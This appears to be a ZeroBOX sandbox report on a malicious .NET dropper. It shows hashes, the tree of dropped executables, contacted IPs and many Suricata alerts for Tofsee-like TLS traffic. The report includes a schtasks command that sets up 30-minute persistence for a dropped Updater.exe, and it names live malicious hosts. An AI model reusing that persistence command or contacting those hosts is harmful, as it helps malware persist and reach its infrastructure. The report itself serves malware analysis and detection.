Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Jan. 30, 2024, 7:51 a.m.	Jan. 30, 2024, 7:55 a.m.

Size	7.3MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`6af4b8b8c8399fca6798e3f2d7df9af5`
SHA256	`84d011e18cec6190e2c79b270e9d2d575bfaa63998f50d13d3f9da147f49b799`
CRC32	`3588BB68`
ssdeep	`196608:pv8GpkVa20mO8hnsSSU/sYE7m/TV38zQF5srpXh+LyDU:zythO+1SNMGcF5svH`
Yara	IsPE32 - (no description) PE_Header_Zero - PE File Signature Is_DotNET_EXE - (no description)

workforroc.exe "C:\Users\test22\AppData\Local\Temp\workforroc.exe"
2548
- InstallSetup9.exe "C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe"
  2636
  - BroomSetup.exe C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
    2896
    - cmd.exe cmd /c ""C:\Users\test22\AppData\Roaming\Temp\Task.bat" "
      940
      - chcp.com chcp 1251
        2116
      - schtasks.exe schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        196
  - nsqFF70.tmp C:\Users\test22\AppData\Local\Temp\nsqFF70.tmp
    2804
- toolspub1.exe "C:\Users\test22\AppData\Local\Temp\toolspub1.exe"
  2692
- 31839b57a4f11171d6abc8bbc4451ee4.exe "C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
  2736
- rty25.exe "C:\Users\test22\AppData\Local\Temp\rty25.exe"
  2788

Name	Response	Post-Analysis Lookup
apps.identrust.com	A 114.108.166.96 CNAME a1952.dscq.akamai.net A 114.108.166.90 CNAME identrust.edgesuite.net	23.67.53.17
i.alie3ksgaa.com	A 154.92.15.189	154.92.15.189

IP Address	Status	Action
114.108.166.90	Active	Moloch
154.92.15.189	Active	Moloch
164.124.101.2	Active	Moloch
185.172.128.109	Active	Moloch
185.172.128.90	Active	Moloch
5.42.64.33	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49179 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49167 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49188 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49182 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49175 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49196 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49213 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49201 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49240 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49202 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49440 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49178 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49208 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49788 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49185 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49235 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49914 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49186 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49292 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50018 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49187 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49482 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50048 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49189 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50144 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50159 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50151 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49192 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50165 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50153 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49198 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50168 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49169 -> 185.172.128.90:80	2011227	ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))	Potentially Bad Traffic
TCP 192.168.56.101:50167 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49184 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49172 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50170 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49174 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50171 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49177 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50174 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50175 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49173 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50172 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50179 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50183 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50196 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50188 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50202 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50203 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50207 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49190 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49176 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50209 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49205 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49200 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50213 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49207 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49203 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50230 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49221 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49211 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50237 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49474 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49180 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49291 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50244 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49609 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49311 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50256 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49851 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49542 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50026 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50265 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49735 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49199 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50052 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49183 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49204 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50145 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49209 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50148 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49220 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50155 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50275 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50156 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50276 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50158 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50277 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50211 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50281 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50212 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50295 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50220 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50296 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50224 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50300 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49194 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50228 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49250 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50235 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49252 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50239 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49280 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50241 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49671 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50246 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49974 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50247 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50106 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50251 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50252 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50257 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50161 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50304 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50259 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50313 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50262 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50267 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50323 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50269 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50027 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50339 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50152 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50291 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50340 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50157 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50297 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50341 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50160 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50162 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50307 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50169 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50163 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50309 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50187 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50318 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50198 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50319 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50201 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50177 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50328 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50206 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50184 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49206 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50334 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50208 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50189 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50337 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50173 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50190 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50343 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50176 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50192 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50178 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50349 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50348 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50180 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50354 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50191 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50357 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50363 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50195 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50365 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50197 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50367 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50210 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50370 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50215 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50193 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50216 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50194 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50384 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50223 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50387 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50226 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50390 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50199 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50233 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50248 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50205 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50249 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50218 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50250 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50232 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50253 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50254 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50258 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50260 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50264 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50236 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50272 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50242 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
